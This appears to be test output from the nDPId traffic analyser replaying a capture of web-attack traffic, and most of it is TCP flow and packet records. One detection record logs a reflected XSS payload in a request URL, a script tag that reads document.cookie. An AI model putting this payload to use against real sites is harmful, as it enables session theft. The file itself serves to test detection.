+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347021621,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347021621,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52790,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"ABm5CmnxAMGxFOsxCABFAAA899BAAD4Gzf+sEAABwKgKMs42AFBUD+tIAAAAAKACchAzVAAAAgQFtAQCCAoBORyYAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1499347021621,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347021621,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzjY7BBUuVA\/rSaAScSDyDwAAAgQFtAQCCAoD4u4OATkcmAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1499347021622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347021622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA099FAAD4GzgasEAABwKgKMs42AFBUD+tJOwQVL4AQAOWRFwAAAQEICgE5HJgD4u4O"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347024196,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347024196,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zI9AAD4G+UCsEAABwKgKMs5QAFAU3NOUAAAAAKACchCHngAAAgQFtAQCCAoBOR8bAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1499347024196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347024196,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzlADb\/iqFNzTlaAScSCX7gAAAgQFtAQCCAoD4vCSATkfGwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1499347024197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347024197,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zJBAAD4G+UesEAABwKgKMs5QAFAU3NOVA2\/4q4AQAOU29QAAAQEICgE5HxwD4vCS"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347025509,"flow_last_seen":1499347025509,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347025509,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52830,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1499347025509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025509,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MX5AAD4GlFKsEAABwKgKMs5eAFDxhxEaAAAAAKACchBsFgAAAgQFtAQCCAoBOSBkAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1499347025510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347025510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzl7gFzLu8YcRG6AScSBkMQAAAgQFtAQCCAoD4vHbATkgZAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1499347025510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347025510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MX9AAD4GlFmsEAABwKgKMs5eAFDxhxEb4Bcy74AQAOUDOQAAAQEICgE5IGQD4vHb"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347028086,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347028086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aaVAAD4GXCusEAABwKgKMs54AFBiKUtNAAAAAKACchC+owAAAgQFtAQCCAoBOSLoAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1499347028086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347028086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQznggYwiEYilLTqAScSCeWQAAAgQFtAQCCAoD4vRfATki6AEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1499347028087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347028087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aaZAAD4GXDKsEAABwKgKMs54AFBiKUtOIGMIhYAQAOU9YQAAAQEICgE5IugD4vRf"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347029372,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347029372,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52870,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qGFAAD4GHW+sEAABwKgKMs6GAFAx0YxIAAAAAKACchCssQAAAgQFtAQCCAoBOSQpAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1499347029372,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347029372,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzoZSq4KNMdGMSaAScSDe1AAAAgQFtAQCCAoD4vWgATkkKQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1499347029373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347029373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qGJAAD4GHXasEAABwKgKMs6GAFAx0YxJUquCjoAQAOV92wAAAQEICgE5JCoD4vWg"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347030639,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347030639,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jW9AAD4GOGGsEAABwKgKMs6UAFA36qgJAAAAAKACchCJjAAAAgQFtAQCCAoBOSVmAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1499347030639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347030639,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzpQiO+l4N+qoCqAScSCD9wAAAgQFtAQCCAoD4vbdATklZgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1499347030640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347030640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jXBAAD4GOGisEAABwKgKMs6UAFA36qgKIjvpeYAQAOUi\/wAAAQEICgE5JWYD4vbd"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347033203,"flow_last_seen":1499347033203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347033203,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1499347033203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033203,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AN5AAD4GxPKsEAABwKgKMs6uAFDsGCc5AAAAAKACchBTkwAAAgQFtAQCCAoBOSfnAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1499347033204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347033204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzq5aBdhx7BgnOqAScSAkugAAAgQFtAQCCAoD4vleATkn5wEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1499347033204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347033204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AN9AAD4GxPmsEAABwKgKMs6uAFDsGCc6WgXYcoAQAOXDwQAAAQEICgE5J+cD4vle"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347034467,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347034467,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rP1AAD4GGNOsEAABwKgKMs68AFB+VYXeAAAAAKACchBhZwAAAgQFtAQCCAoBOSkjAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzrxiNhMTflWF36AScSDufwAAAgQFtAQCCAoD4vqaATkpIwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1499347034468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347034468,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rP5AAD4GGNqsEAABwKgKMs68AFB+VYXfYjYTFIAQAOWNhwAAAQEICgE5KSMD4vqa"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347035750,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347035750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1499347038277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347038277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03pRAAD4G50OsEAABwKgKMs7kAFBDY\/JJuaT1l4AQAOUahAAAAQEICgE5LNwD4v5S"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347039587,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347039587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LfVAAD4Gl9usEAABwKgKMs7yAFDXyAPWAAAAAKACchCExgAAAgQFtAQCCAoBOS4jAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzvKH9tkB18gD16AScSAhMAAAAgQFtAQCCAoD4v+aATkuIwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1499347039588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347039588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LfZAAD4Gl+KsEAABwKgKMs7yAFDXyAPXh\/bZAoAQAOXANwAAAQEICgE5LiMD4v+a"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347042150,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347042150,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1JAAD4GGn6sEAABwKgKMs8MAFB23Zv2AAAAAKACchBK9gAAAgQFtAQCCAoBOTCkAAAAAAEDAwc="} 